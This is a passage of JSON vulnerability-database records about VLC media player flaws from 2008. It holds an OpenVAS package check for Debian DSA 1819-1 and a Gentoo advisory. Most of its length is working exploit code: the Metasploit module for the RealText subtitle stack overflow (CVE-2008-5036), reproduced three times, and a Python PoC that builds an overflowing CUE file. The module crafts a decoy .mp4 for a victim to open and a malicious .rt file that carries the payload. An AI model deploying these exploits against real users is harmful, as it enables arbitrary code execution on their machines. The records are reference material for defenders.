isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update to vlc\nannounced via advisory DSA 1819-1.", "modified": "2017-07-07T00:00:00", "published": "2009-06-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64255", "id": "OPENVAS:64255", "title": "Debian Security Advisory DSA 1819-1 (vlc)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1819_1.nasl 6615 2017-07-07 12:09:52Z cfischer $\n# Description: Auto-generated from advisory DSA 1819-1 (vlc)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in vlc, a multimedia player\nand streamer. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-1768\n\nDrew Yao discovered that multiple integer overflows in the MP4 demuxer,\nReal demuxer and Cinepak codec can lead to the execution of arbitrary\ncode.\n\nCVE-2008-1769\n\nDrew Yao discovered that the Cinepak codec is prone to a memory\ncorruption, which can be triggered by a crafted Cinepak file.\n\nCVE-2008-1881\n\nLuigi Auriemma discovered that it is possible to execute arbitrary code\nvia a long subtitle in an SSA file.\n\nCVE-2008-2147\n\nIt was discovered that vlc is prone to a search path vulnerability,\nwhich allows local users to perform privilege escalations.\n\nCVE-2008-2430\n\nAlin Rad Pop discovered that it is possible to execute arbitrary code\nwhen opening a WAV file containing a large fmt chunk.\n\nCVE-2008-3794\n\nPnar Yanarda discovered that it is possible to execute arbitrary code\nwhen opening a crafted mmst link.\n\nCVE-2008-4686\n\nTobias Klein discovered that it is possible to execute arbitrary code\nwhen opening a crafted .ty file.\n\nCVE-2008-5032\n\nTobias Klein discovered that it is possible to execute arbitrary code\nwhen opening an invalid CUE image file with a crafted header.\n\n\nFor the oldstable distribution (etch), these problems have been fixed\nin version 0.8.6-svn20061012.debian-5.1+etch3.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 0.8.6.h-4+lenny2, which was already included in the lenny\nrelease.\n\nFor the testing distribution (squeeze) and the unstable distribution\n(sid), these problems have been fixed in version 0.8.6.h-5.\n\n\nWe recommend that you upgrade your vlc packages.\";\ntag_summary = \"The remote host is missing an update to vlc\nannounced via advisory DSA 1819-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201819-1\";\n\n\nif(description)\n{\n script_id(64255);\n script_version(\"$Revision: 6615 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:52 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-23 15:49:15 +0200 (Tue, 23 Jun 2009)\");\n script_cve_id(\"CVE-2008-1768\", \"CVE-2008-1769\", \"CVE-2008-1881\", \"CVE-2008-2147\", \"CVE-2008-2430\", \"CVE-2008-3794\", \"CVE-2008-4686\", \"CVE-2008-5032\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1819-1 (vlc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wxvlc\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-alsa\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-esd\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-arts\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc0\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mozilla-plugin-vlc\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-nox\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-sdl\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libvlc0-dev\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-ggi\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-glide\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"vlc-plugin-svgalib\", ver:\"0.8.6-svn20061012.debian-5.1+etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2018-09-10T01:49:30", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow vulnerability in VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of RealText subtitle files. In order to exploit this, this module will generate two files: The .mp4 file is used to trick your victim into running. The .rt file is the actual malicious file that triggers the vulnerability, which should be placed under the same directory as the .mp4 file.", "modified": "2017-07-24T13:26:21", "published": "2012-03-01T22:06:40", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_REALTEXT", "href": "", "type": "metasploit", "title": "VLC Media Player RealText Subtitle Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'VLC Media Player RealText Subtitle Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow vulnerability in\n VideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of\n RealText subtitle files.\n\n In order to exploit this, this module will generate two files:\n The .mp4 file is used to trick your victim into running. The .rt file\n is the actual malicious file that triggers the vulnerability, which\n should be placed under the same directory as the .mp4 file.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Tobias Klein', # Vulnerability Discovery\n 'SkD', # Exploit\n 'juan vazquez' # Metasploit Module\n ],\n 'References' =>\n [\n [ 'OSVDB', '49809' ],\n [ 'CVE', '2008-5036' ],\n [ 'BID', '32125' ],\n [ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-011.txt' ],\n [ 'URL', 'http://www.videolan.org/security/sa0810.html' ]\n ],\n 'Payload' =>\n {\n 'Space' => 1900,\n 'DisableNops' => true,\n 'BadChars' => \"\\x00\\x22\\x0a\",\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1',\n {\n 'Ret' => 0x68f0cfad, # jmp esp # libqt4_plugin.dll\n 'WritableAddress' => 0x695d5890 # libqt4_plugin.dll .data\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Nov 05 2008',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.rt']),\n ])\n end\n\n def generate_mp4\n mp4 = ''\n # ftyp\n mp4 << \"\\x00\\x00\\x00\\x14\" #Size\n mp4 << \"ftyp\" #Type\n mp4 << \"isom\" #Major brand\n mp4 << \"\\x00\\x00\" #version\n mp4 << \"\\x00\\x00\"\n mp4 << \"mp41\" #Compatible brands\n # moov\n mp4 << \"\\x00\\x00\\x00\\x9f\" #Size\n mp4 << \"moov\" #Type\n mp4 << \"\\x00\\x00\\x00\\x6c\\x6d\\x76\\x68\\x64\\x00\\x00\\x00\\x00\\xcb\\x75\\xf1\\xc2\\xcb\\x75\\xf1\\xc2\"\n mp4 << \"\\x00\\x01\\x5f\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n mp4 << \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n mp4 << \"\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"\n mp4 << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n mp4 << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x2b\"\n mp4 << \"udta\"\n mp4 << \"\\x00\\x00\\x00\\x23\"\n mp4 << \"\\xa9\\x65\\x6e\\x63\\x00\\x17\\x00\\x00\"\n mp4 << \"vlc 0.9.4 stream output\"\n # wide\n mp4 << \"\\x00\\x00\\x00\\x08\"\n mp4 << \"wide\"\n # mdat\n mp4 << \"\\x00\\x00\\x00\\x08\"\n mp4 << \"mdat\"\n\n return mp4\n end\n\n def generate_rt\n my_payload = \"\"\n my_payload << Rex::Text.rand_text(72, payload_badchars)\n my_payload << [target.ret].pack(\"V\") # EIP => jmp esp\n my_payload << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+8\").encode_string # ESP => jmp after \"Writable address\"\n my_payload << Rex::Text.rand_text(2, payload_badchars)\n my_payload << [target['WritableAddress']].pack(\"V\") # Writable address\n my_payload << payload.encoded\n\n rt_file = <<-eos\n<window height=\"250\" width=\"300\" duration=\"15\" bgcolor=\"yellow\">\nMary had a little lamb,\n<br/><time begin=\"#{my_payload}\"/>\n<br/><time begin=\"6\"/>little lamb,\n<br/><time begin=\"9\"/>Mary had a little lamb\n<br/><time begin=\"12\"/>whose fleece was white as snow.\n</window>\n eos\n\n return rt_file\n end\n\n def exploit\n\n mp4 = generate_mp4\n rt = generate_rt\n\n print_status(\"Creating '#{datastore['FILENAME']}'. Put this file under the same directory as the mp4 file\")\n file_create(rt)\n\n original_fname = datastore['FILENAME']\n datastore['FILENAME'] = original_fname.scan(/(\\w+).\\w+/).flatten[0] + \".mp4\"\n print_status(\"Creating '#{datastore['FILENAME']}'. This is the file your victim should open.\")\n file_create(mp4)\n\n datastore['FILENAME'] = original_fname\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/vlc_realtext.rb"}], "gentoo": [{"lastseen": "2016-09-06T19:46:27", "bulletinFamily": "unix", "description": "### Background\n\nVLC is a cross-platform media player and streaming server. \n\n### Description\n\nTobias Klein reported the following vulnerabilities: \n\n * A stack-based buffer overflow when processing CUE image files in modules/access/vcd/cdrom.c (CVE-2008-5032).\n * A stack-based buffer overflow when processing RealText (.rt) subtitle files in the ParseRealText() function in modules/demux/subtitle.c (CVE-2008-5036).\n * An integer overflow when processing RealMedia (.rm) files in the ReadRealIndex() function in real.c in the Real demuxer plugin, leading to a heap-based buffer overflow (CVE-2008-5276).\n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted CUE image file, RealMedia file or RealText subtitle file, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll VLC users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-video/vlc-0.9.8a\"", "modified": "2008-12-24T00:00:00", "published": "2008-12-24T00:00:00", "id": "GLSA-200812-24", "href": "https://security.gentoo.org/glsa/200812-24", "type": "gentoo", "title": "VLC: Multiple vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T11:08:55", "bulletinFamily": "exploit", "description": "VLC Media Player < 0.9.6 (CUE) Local Buffer Overflow PoC. CVE-2008-5032. Dos exploit for windows platform", "modified": "2009-09-15T00:00:00", "published": "2009-09-15T00:00:00", "id": "EDB-ID:9686", "href": "https://www.exploit-db.com/exploits/9686/", "type": "exploitdb", "title": "VLC Media Player < 0.9.6 CUE Local Buffer Overflow PoC", "sourceData": "#!/usr/bin/env python\n\n####################################################################################\n#\n# VLC Media Player < 0.9.6 (.CUE) Buffer Overflow PoC\n# Found By:\tDr_IDE\n# Tested On:\tXPSP3\n#\n####################################################################################\n\nhead = (\"\\x46\\x49\\x4c\\x45\\x20\\x22\")\nbuff = (\"\\x41\" * 10000)\nfoot = (\n\"\\x2e\\x42\\x49\\x4e\\x22\\x20\\x42\\x49\\x4e\\x41\\x52\\x59\\x0d\\x0a\\x20\\x54\"\n\"\\x52\\x41\\x43\\x4b\\x20\\x30\\x31\\x20\\x4d\\x4f\\x44\\x45\\x31\\x2f\\x32\\x33\"\n\"\\x35\\x32\\x0d\\x0a\\x20\\x20\\x20\\x49\\x4e\\x44\\x45\\x58\\x20\\x30\\x31\\x20\"\n\"\\x30\\x30\\x3a\\x30\\x30\\x3a\\x30\\x30\")\n\nf1 = open(\"vlc_0.8.6.cue\",\"w\")\nf1.write(head + buff + foot)\nf1.close()\n\n# milw0rm.com [2009-09-15]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9686/"}, {"lastseen": "2016-02-02T09:57:02", "bulletinFamily": "exploit", "description": "VLC Media Player RealText Subtitle Overflow. CVE-2008-5036. Local exploit for windows platform", "modified": "2012-03-02T00:00:00", "published": "2012-03-02T00:00:00", "id": "EDB-ID:18548", "href": "https://www.exploit-db.com/exploits/18548/", "type": "exploitdb", "title": "VLC Media Player RealText Subtitle Overflow", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'VLC Media Player RealText Subtitle Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in\r\n\t\t\t\tVideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of\r\n\t\t\t\tRealText subtitle files.\r\n\r\n\t\t\t\t\tIn order to exploit this, this module will generate two files:\r\n\t\t\t\tThe .mp4 file is used to trick your victim into running. The .rt file\r\n\t\t\t\tis the actual malicious file that triggers the vulnerability, which\r\n\t\t\t\tshould be placed under the same directory as the .mp4 file.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Tobias Klein', # Vulnerability Discovery\r\n\t\t\t\t\t'SkD', # Exploit\r\n\t\t\t\t\t'juan vazquez' # Metasploit Module\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'OSVDB', '49809' ],\r\n\t\t\t\t\t[ 'CVE', '2008-5036' ],\r\n\t\t\t\t\t[ 'BID', '32125' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-011.txt' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.videolan.org/security/sa0810.html' ]\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1900,\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x22\\x0a\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Ret' => 0x68f0cfad, # jmp esp # libqt4_plugin.dll\r\n\t\t\t\t\t\t\t'WritableAddress' => 0x695d5890 # libqt4_plugin.dll .data\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => 'Nov 05 2008',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.rt']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef generate_mp4\r\n\t\tmp4 = ''\r\n\t\t# ftyp\r\n\t\tmp4 << \"\\x00\\x00\\x00\\x14\" #Size\r\n\t\tmp4 << \"ftyp\" #Type\r\n\t\tmp4 << \"isom\" #Major brand\r\n\t\tmp4 << \"\\x00\\x00\" #version\r\n\t\tmp4 << \"\\x00\\x00\"\r\n\t\tmp4 << \"mp41\" #Compatible brands\r\n\t\t# moov\r\n\t\tmp4 << \"\\x00\\x00\\x00\\x9f\" #Size\r\n\t\tmp4 << \"moov\" #Type\r\n\t\tmp4 << \"\\x00\\x00\\x00\\x6c\\x6d\\x76\\x68\\x64\\x00\\x00\\x00\\x00\\xcb\\x75\\xf1\\xc2\\xcb\\x75\\xf1\\xc2\"\r\n\t\tmp4 << \"\\x00\\x01\\x5f\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tmp4 << \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tmp4 << \"\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\"\r\n\t\tmp4 << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\t\tmp4 << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x2b\"\r\n\t\tmp4 << \"udta\"\r\n\t\tmp4 << \"\\x00\\x00\\x00\\x23\"\r\n\t\tmp4 << \"\\xa9\\x65\\x6e\\x63\\x00\\x17\\x00\\x00\"\r\n\t\tmp4 << \"vlc 0.9.4 stream output\"\r\n\t\t# wide\r\n\t\tmp4 << \"\\x00\\x00\\x00\\x08\"\r\n\t\tmp4 << \"wide\"\r\n\t\t# mdat\r\n\t\tmp4 << \"\\x00\\x00\\x00\\x08\"\r\n\t\tmp4 << \"mdat\"\r\n\r\n\t\treturn mp4\r\n\tend\r\n\r\n\tdef generate_rt\r\n\t\tmy_payload = \"\"\r\n\t\tmy_payload << Rex::Text.rand_text(72, payload_badchars)\r\n\t\tmy_payload << [target.ret].pack(\"V\") # EIP => jmp esp\r\n\t\tmy_payload << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+8\").encode_string # ESP => jmp after \"Writable address\"\r\n\t\tmy_payload << Rex::Text.rand_text(2, payload_badchars)\r\n\t\tmy_payload << [target['WritableAddress']].pack(\"V\") # Writable address\r\n\t\tmy_payload << payload.encoded\r\n\r\n\t\trt_file = <<-eos\r\n<window height=\"250\" width=\"300\" duration=\"15\" bgcolor=\"yellow\">\r\nMary had a little lamb,\r\n<br/><time begin=\"#{my_payload}\"/>\r\n<br/><time begin=\"6\"/>little lamb,\r\n<br/><time begin=\"9\"/>Mary had a little lamb\r\n<br/><time begin=\"12\"/>whose fleece was white as snow.\r\n</window>\r\n\t\teos\r\n\r\n\t\treturn rt_file\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tmp4 = generate_mp4\r\n\t\trt = generate_rt\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}'. Put this file under the same directory as the mp4 file\")\r\n\t\tfile_create(rt)\r\n\r\n\t\toriginal_fname = datastore['FILENAME']\r\n\t\tdatastore['FILENAME'] = original_fname.scan(/(\\w+).\\w+/).flatten[0] + \".mp4\"\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}'. This is the file your victim should open.\")\r\n\t\tfile_create(mp4)\r\n\r\n\t\tdatastore['FILENAME'] = original_fname\r\n\r\n\tend\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18548/"}], "packetstorm": [{"lastseen": "2016-12-05T22:22:03", "bulletinFamily": "exploit", "description": "", "modified": "2012-03-03T00:00:00", "published": "2012-03-03T00:00:00", "href": "https://packetstormsecurity.com/files/110408/VLC-Media-Player-RealText-Subtitle-Overflow.html", "id": "PACKETSTORM:110408", "type": "packetstorm", "title": "VLC Media Player RealText Subtitle Overflow", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'VLC Media Player RealText Subtitle Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow vulnerability in \nVideoLAN VLC < 0.9.6. The vulnerability exists in the parsing of \nRealText subtitle files. \n \nIn order to exploit this, this module will generate two files: \nThe .mp4 file is used to trick your victim into running. The .rt file \nis the actual malicious file that triggers the vulnerability, which \nshould be placed under the same directory as the .mp4 file. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Tobias Klein', # Vulnerability Discovery \n'SkD', # Exploit \n'juan vazquez' # Metasploit Module \n], \n'Version' => '$Revision: $', \n'References' => \n[ \n[ 'OSVDB', '49809' ], \n[ 'CVE', '2008-5036' ], \n[ 'BID', '32125' ], \n[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-011.txt' ], \n[ 'URL', 'http://www.videolan.org/security/sa0810.html' ] \n], \n'Payload' => \n{ \n'Space' => 1900, \n'DisableNops' => true, \n'BadChars' => \"\\x00\\x22\\x0a\", \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'VLC 0.9.4 on Windows XP SP3 / Windows 7 SP1', \n{ \n'Ret' => 0x68f0cfad, # jmp esp # libqt4_plugin.dll \n'WritableAddress' => 0x695d5890 # libqt4_plugin.dll .data \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Nov 05 2008', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.rt']), \n], self.class) \nend \n \ndef generate_mp4 \nmp4 = '' \n# ftyp \nmp4 << \"\\x00\\x00\\x00\\x14\" #Size \nmp4 << \"ftyp\" #Type \nmp4 << \"isom\" #Major brand \nmp4 << \"\\x00\\x00\" #version \nmp4 << \"\\x00\\x00\" \nmp4 << \"mp41\" #Compatible brands \n# moov \nmp4 << \"\\x00\\x00\\x00\\x9f\" #Size \nmp4 << \"moov\" #Type \nmp4 << \"\\x00\\x00\\x00\\x6c\\x6d\\x76\\x68\\x64\\x00\\x00\\x00\\x00\\xcb\\x75\\xf1\\xc2\\xcb\\x75\\xf1\\xc2\" \nmp4 << \"\\x00\\x01\\x5f\\x90\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nmp4 << \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nmp4 << \"\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x40\\x00\\x00\\x00\" \nmp4 << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nmp4 << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x2b\" \nmp4 << \"udta\" \nmp4 << \"\\x00\\x00\\x00\\x23\" \nmp4 << \"\\xa9\\x65\\x6e\\x63\\x00\\x17\\x00\\x00\" \nmp4 << \"vlc 0.9.4 stream output\" \n# wide \nmp4 << \"\\x00\\x00\\x00\\x08\" \nmp4 << \"wide\" \n# mdat \nmp4 << \"\\x00\\x00\\x00\\x08\" \nmp4 << \"mdat\" \n \nreturn mp4 \nend \n \ndef generate_rt \nmy_payload = \"\" \nmy_payload << Rex::Text.rand_text(72, payload_badchars) \nmy_payload << [target.ret].pack(\"V\") # EIP => jmp esp \nmy_payload << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $+8\").encode_string # ESP => jmp after \"Writable address\" \nmy_payload << Rex::Text.rand_text(2, payload_badchars) \nmy_payload << [target['WritableAddress']].pack(\"V\") # Writable address \nmy_payload << payload.encoded \n \nrt_file = <<-eos \n<window height=\"250\" width=\"300\" duration=\"15\" bgcolor=\"yellow\"> \nMary had a little lamb, \n<br/><time begin=\"#{my_payload}\"/> \n<br/><time begin=\"6\"/>little lamb, \n<br/><time begin=\"9\"/>Mary had a little lamb \n<br/><time begin=\"12\"/>whose fleece was white as snow. \n</window> \neos \n \nreturn rt_file \nend \n \ndef exploit \n \nmp4 = generate_mp4 \nrt = generate_rt \n \nprint_status(\"Creating '#{datastore['FILENAME']}'. Put this file under the same directory as the mp4 file\") \nfile_create(rt) \n \noriginal_fname = datastore['FILENAME'] \ndatastore['FILENAME'] = original_fname.scan(/(\\w+).\\w+/).flatten[0] + \".mp4\" \nprint_status(\"Creating '#{datastore['FILENAME']}'. This is the file your victim should open.\") \nfile_create(mp4) \n \ndatastore['FILENAME'] = original_fname \n \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/110408/vlc_realtext.rb.txt"}], "saint": [{"lastseen": 